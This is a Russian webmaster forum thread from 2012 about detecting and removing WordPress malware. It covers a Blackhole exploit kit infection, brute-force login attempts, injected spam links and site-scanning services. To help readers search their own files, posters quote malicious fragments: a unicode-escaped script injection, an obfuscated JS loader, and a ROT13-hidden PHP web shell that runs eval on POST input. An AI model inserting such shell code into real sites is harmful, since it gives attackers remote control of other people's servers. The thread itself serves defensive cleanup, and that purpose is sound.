Помощник
|
Вредоносный код в wordpress - Mal/JSIfrLd-A, Помогите отловить |
Electric |
9.3.2012, 7:59;
Ответить: Electric
Сообщение
#122
|
|
Сегодня срочно пришлось чистить один сайт, на который ругался AVG. Постоянно обнаруживался Blackhole Exploit Kit Detection (type 1889).
Благодоря sitecheck.sucuri.net/scanner был обнаружен левый код в одном из файлов темы. Вылаживаю часть кода: document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020 Что декодируется этим деколдером http://home.comcast.net/~jscheuer1/side/decoder.htm как: document.write("<script Так что проверяйте свои файлы на наличие: \u0073\u0063\u0072\u0069\u0070\u0074 Кстати для проверки сайтов на вирусы есть еще такие сайты: http://www.safeweb.norton.com http://www.avgthreatlabs.com/sitereports/ http://www.virustotal.com (click the “Scan a URL”) Сообщение отредактировал Electric - 8.3.2012, 15:10 -------------------- |
|
|
Rxp |
10.3.2012, 12:01;
Ответить: Rxp
Сообщение
#123
|
|
Сегодня срочно пришлось чистить один сайт, на который ругался AVG. Постоянно обнаруживался Blackhole Exploit Kit Detection (type 1889). Благодоря sitecheck.sucuri.net/scanner был обнаружен левый код в одном из файлов темы. Вылаживаю часть кода: document.write("\u003C\u0073\u0063\u0072\u0069\u0070\u0074\u0020 Что декодируется этим деколдером http://home.comcast.net/~jscheuer1/side/decoder.htm как: document.write("<script Так что проверяйте свои файлы на наличие: \u0073\u0063\u0072\u0069\u0070\u0074 Данные кодировки уже не новы. АКЦИЯ! Для всех у кого есть подозрение на вирусы, проверим ваши сайты на вирусы и шеллы, Вы платите только за результат! Стучите в асю! -------------------- |
|
|
rus23kav |
12.3.2012, 22:00;
Ответить: rus23kav
Сообщение
#124
|
|
Зашел на хостинг посмотреть лог сайта, а там куча запросов типа:
202.80.147.185 - - [12/Mar/2012:21:32:34 +0400] "POST /wp-login.php HTTP/1.0" 200 3889 "http://мой сайт.RU/wp-login.php" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1" 94.50.164.87 - - [12/Mar/2012:21:32:37 +0400] "GET /favicon.ico HTTP/1.0" 200 16958 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" Это так понимаю кто-то пытается зайти в админку? Запросы /wp-login.php и все с разных ip, перебирают пароли что ли? -------------------- |
|
|
Electric |
13.3.2012, 0:42;
Ответить: Electric
Сообщение
#125
|
|
Это так понимаю кто-то пытается зайти в админку? Да, возможно пароль уже знают - посмотрите на наличия левого кода в файлах. Возможно пытаются запутать вас.
Запросы /wp-login.php и все с разных ip, перебирают пароли что ли? -------------------- |
|
|
mikka |
13.3.2012, 10:53;
Ответить: mikka
Сообщение
#126
|
|
Из ниоткуда на сайте стали появляться левые ссылки.
В индексном файле была найдена пакость, которая добавляла код лишний в index.php и в итоге имели около 700 внешних ссылок на какой то левый ресурс. А также была найдена папка с залитым ГС, которая благополучно была снесена и больше не появлялась. А вот левый код появлялся раз в сутки-двое после удаления. Спасибо большое Электрику за оказанную помощь. Дырок в файлах сайта найдено не было и решено было свалить с Таймвеба. TimeWeb (Таймвеб) - самый дырявый хостинг в мире. И о чудо, никакого левого кода, никаких лишних ссылок. -------------------- |
|
|
rus23kav |
13.3.2012, 20:45;
Ответить: rus23kav
Сообщение
#127
|
|
Сменил все пароли, кроме от базы, поставил пароль на папку админ, перезалил все файлы движка, темы и плагины - вроде все ок', пока вирусов нет, надеюсь хоть эти меры спасут!
-------------------- |
|
|
Electric |
13.3.2012, 23:18;
Ответить: Electric
Сообщение
#128
|
|
TimeWeb (Таймвеб) - самый дырявый хостинг в мире. Вот еще про таймвеб: http://forum.searchengines.ru/showthread.php?t=632841
-------------------- |
|
|
Electric |
16.3.2012, 2:36;
Ответить: Electric
Сообщение
#129
|
|
Еще може встречатся такой код:
$cmfunc=@create_function('', str_rot13('riny($_CBFG[\'m0\']);'));@$cmfunc(); гдеstr_rot13('riny($_CBFG[\'m0\']); декодируется какeval($_POST['z0']); что по сути есть шелл исполняющий отправленный постом код...
-------------------- |
|
|
Electric |
17.3.2012, 12:35;
Ответить: Electric
Сообщение
#130
|
|
Недавно чистил от злобного вируса JS.Siggen.192 сайт на ВП и форум...
Более 200 модифицированых копий в разных файлах... Искать нужно что то подобное этому: var p333bb1="";function y19a2a6ef9f(){var l07cb898=String,ub4008a0=Array.prototype.slice.call(arguments).join(""),q4a46a=ub4008a0.substr(1,3)-395,tf192c7ba Так как код постоянно модифицируется - неизменным остаеттся вот это: Array.prototype.slice.call(arguments).join("") Вирус очень геморный... -------------------- |
|
|
Electric |
21.3.2012, 0:25;
Ответить: Electric
Сообщение
#131
|
|
Внимание недавно Яндекс начал ругаться на сайты на которых точно ничего не было... Оказалось что тут може быть замешан Гугл!
http://habrahabr.ru/post/140303/ Еще можно сканировать вот этим сайтом: http://wepawet.iseclab.org/index.php http://sitecheck.sucuri.net/scanner - он если находит то точно чтото есть а если не находит - смотрите другими, что упоминал ранее. -------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Нужен кодер, чтобы пофиксить ошибку Wordpress после переноса сайта | 0 | Alex-777 | 810 | 7.4.2024, 18:05 автор: Alex-777 |
|
Продам базу сайтов Wordpress в 16 миллионов доменов! Свежая сборка. | 17 | Boymaster | 10862 | 17.3.2024, 2:53 автор: Boymaster |
|
Перенос сайта на CMS Wordpress | 8 | freeax | 4951 | 10.3.2024, 14:58 автор: freeax |
|
Как настроить в WordPress для SEO оптимизации | 8 | rownong27 | 2471 | 2.3.2024, 12:59 автор: toplinks |
|
Восстановление сайтов из Вебархива на Wordpress. | 39 | freeax | 32728 | 14.2.2024, 14:32 автор: freeax |
Текстовая версия | Сейчас: 18.4.2024, 7:08 |